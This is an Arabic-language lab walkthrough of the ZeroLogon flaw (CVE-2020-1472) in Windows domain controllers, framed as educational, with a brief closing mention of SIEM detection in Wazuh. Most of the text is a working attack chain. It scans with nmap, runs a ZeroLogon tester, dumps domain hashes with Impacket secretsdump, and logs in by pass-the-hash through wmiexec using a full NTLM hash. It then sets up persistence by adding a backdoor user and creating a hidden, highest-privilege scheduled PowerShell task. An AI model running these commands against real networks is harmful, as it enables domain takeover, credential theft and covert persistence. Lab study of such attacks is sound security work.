
شرح وتوضيح لثغرة ZeroLogon (CVE-2020-1472)
شرح وإظهار الثغرة الأمنية ZeroLogon (CVE-2020-1472)
الهدف من هذا المختبر هو تعليمي بحت. لا يُنصح بتنفيذه في بيئات إنتاجية أو بيئات لا تملكها.
سياق الثغرة الأمنية
تسمح هذه الثغرة الأمنية لمجرم إلكتروني بالسيطرة على وحدة تحكم المجال (DC). يتم ذلك عن طريق تغيير أو إزالة كلمة مرور حساب خدمة على وحدة التحكم. يمكن للجهة الخبيثة ببساطة التسبب في رفض الخدمة أو السيطرة على الشبكة بأكملها. في أغسطس 2020، أصدرت مايكروسوفت تحديثًا أمنيًا.
المكون المتأثر: بروتوكول Netlogon عن بعد من مايكروسوفت (MS-NRPC)
إصدارات ويندوز المتأثرة:
استنساخ المستودعات
إذا كنت ستقوم بالتشغيل محليًا!
على AWS أيضًا ممكن مع هذه الصور (احذر من الفوترة)
إضافي: حساب على Wazuh لتحليل أحداث SIEM.
تلميح: في Kali Linux، خدمة SSH تكون معطلة افتراضيًا — من الضروري تشغيلها يدويًا.
قبل اختبار ما إذا كان الخادم معرضًا للثغرة، يمكننا استخدام nmap لمعرفة المنافذ المفتوحة:
nmap -sS -T4 -F --open -n ip
باستخدام CVE-2020-1472 - اختبار إذا كان الخادم الهدف معرضًا للثغرة. نفّذ الأمر:
zerologon_tester.py <dc-name> <dc-ip>
أداة secretdump هي مجموعة أدوات من Impacket
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
إذا سار كل شيء على ما يرام، سنتمكن من تسجيل الدخول باستخدام الهاش ما هي هجمات تمرير الهاش؟
الآن فقط قم بإنشاء استمرارية! يمكن أن يكون مستخدمًا جديدًا!
net user coringa Batman2025 /add
تم! تم إنشاء المستخدم بنجاح!
من الممكن أيضًا إنشاء مهمة!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# سكريبت النسخ الاحتياطي'\"" /SC ONLOGON /RL HIGHEST /F
من الممكن رؤية إنشاء المستخدمين والأحداث المتعلقة بـ تمرير الهاش وإنشاء المستخدمين!